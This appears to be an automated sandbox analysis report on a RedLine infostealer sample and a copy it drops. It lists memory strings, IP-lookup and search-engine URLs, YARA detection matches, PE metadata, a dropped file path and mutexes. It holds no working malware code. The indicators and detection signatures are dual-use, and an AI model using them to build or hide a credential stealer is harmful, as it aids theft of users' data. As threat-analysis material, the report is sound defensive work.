                    Source: RgIbrhxoEx.exe, RgIbrhxoEx.exe, 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: RgIbrhxoEx.exe, RgIbrhxoEx.exe, 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2337066239.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2337066239.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: RgIbrhxoEx.exe, RgIbrhxoEx.exe, 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: RgIbrhxoEx.exe, LjGABleGAy.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.LjGABleGAy.exe.4263440.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 10.2.LjGABleGAy.exe.4263440.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.LjGABleGAy.exe.424b620.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 10.2.LjGABleGAy.exe.424b620.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 8.2.RgIbrhxoEx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 8.2.RgIbrhxoEx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.LjGABleGAy.exe.4263440.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 10.2.LjGABleGAy.exe.4263440.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.LjGABleGAy.exe.424b620.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 10.2.LjGABleGAy.exe.424b620.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: RgIbrhxoEx.exe PID: 5440, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: RgIbrhxoEx.exe PID: 3620, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: LjGABleGAy.exe PID: 1880, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.RgIbrhxoEx.exe.5270000.5.raw.unpack, SizeParameters.cs Large array initialization: array initializer size 15921
                    Source: RgIbrhxoEx.exe Static PE information: invalid certificate
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2134740884.0000000005270000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2135400131.0000000005F40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2133731245.0000000003F7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2130972981.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2133067683.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2133067683.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000000.00000000.2039485781.0000000000938000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameiLuj.exe8 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2243652387.0000000001438000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.0000000003146000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe Binary or memory string: OriginalFilenameiLuj.exe8 vs RgIbrhxoEx.exe
                    Source: RgIbrhxoEx.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.LjGABleGAy.exe.4263440.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 10.2.LjGABleGAy.exe.4263440.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.LjGABleGAy.exe.424b620.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 10.2.LjGABleGAy.exe.424b620.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 8.2.RgIbrhxoEx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 8.2.RgIbrhxoEx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.LjGABleGAy.exe.4263440.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 10.2.LjGABleGAy.exe.4263440.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.LjGABleGAy.exe.424b620.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 10.2.LjGABleGAy.exe.424b620.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: RgIbrhxoEx.exe PID: 5440, type: MEMORYSTR, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: RgIbrhxoEx.exe PID: 3620, type: MEMORYSTR, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: LjGABleGAy.exe PID: 1880, type: MEMORYSTR, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: RgIbrhxoEx.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: LjGABleGAy.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, A8wQQPxStWJpqrtu18.cs, Security API names: _0020.SetAccessControl
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, A8wQQPxStWJpqrtu18.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, A8wQQPxStWJpqrtu18.cs, Security API names: _0020.AddAccessRule
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, UjapGcaBaYOORK0HUJ.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, UjapGcaBaYOORK0HUJ.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, A8wQQPxStWJpqrtu18.cs, Security API names: _0020.SetAccessControl
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, A8wQQPxStWJpqrtu18.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, A8wQQPxStWJpqrtu18.cs, Security API names: _0020.AddAccessRule
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, UjapGcaBaYOORK0HUJ.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, A8wQQPxStWJpqrtu18.cs, Security API names: _0020.SetAccessControl
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, A8wQQPxStWJpqrtu18.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, A8wQQPxStWJpqrtu18.cs, Security API names: _0020.AddAccessRule
                    Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@21/103@1/1
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe, File created: C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe, Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03
